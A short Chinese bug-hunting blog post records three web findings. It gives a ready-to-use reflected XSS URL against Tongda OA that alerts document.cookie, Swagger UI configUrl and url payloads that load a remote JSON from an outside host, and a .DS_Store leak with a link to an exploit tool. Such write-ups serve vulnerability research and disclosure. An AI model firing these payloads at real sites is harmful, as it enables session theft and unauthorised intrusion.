每日水洞+1(通达OA xss以及swagger xss)

今日edu收获为0,仅收获两xss和一个ds_store文件泄露(不知道收不收)

1.通达oa xss漏洞

漏洞复现:

个人感觉应该是白盒审计出来的吧,应该不是黑盒测试吧,js也没找到该目录泄露
序列 onerror=alert(document.cookie) 尝试注入一个JavaScript事件处理器 onerror,如果在浏览器中执行,它会触发一个警告框来显示 document.cookie 的内容

漏洞利用:

paylod:/module/html_editor/editor/plugins/td_listview/td_listview.php?GZIP_POSTFIX=%22+onerror=alert(document.cookie)+a=1

修复建议:

对输入的数据进行严格的过滤,禁止一切异常字符的传参,修改get传参为post传参

2.swagger xss漏洞

漏洞存在:

一般有百分之九十都有该漏洞,适用于swagger版本在3.xxx
查看swagger版本:

在控制台中输入JSON.stringify(versions)

漏洞利用:

payload:
?configUrl=https://jumpy-floor.surge.sh/test.json
/swagger-ui.html?configUrl=https://jumpy-floor.surge.sh/test.json
/swagger-ui.html?url=https://jumpy-floor.surge.sh/test.json
/swagger-ui.html?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==

3.ds_store文件泄露

漏洞成因:

.DS_Store是Mac OS保存文件夹的自定义属性的隐藏文件,由于开发人员在发布代码时未删除文件夹中隐藏的.DS store,可能造成文件目录结构泄漏、源代码文件等敏感信息的泄露。

危害:

在迁移代码时把苹果的隐藏文件DS Store也迁移过去了,导致泄露了目录结构,从而获取到后台管理页面以及数据库文件。

利用:

http://xxx/.DS_Store

漏洞利用工具:

ds_store_exp
下载地址:https://github.com/lijiejie/ds_store_exp

posted @ 2024-11-13 14:36  Zephyr07  阅读(60)  评论(0)    收藏  举报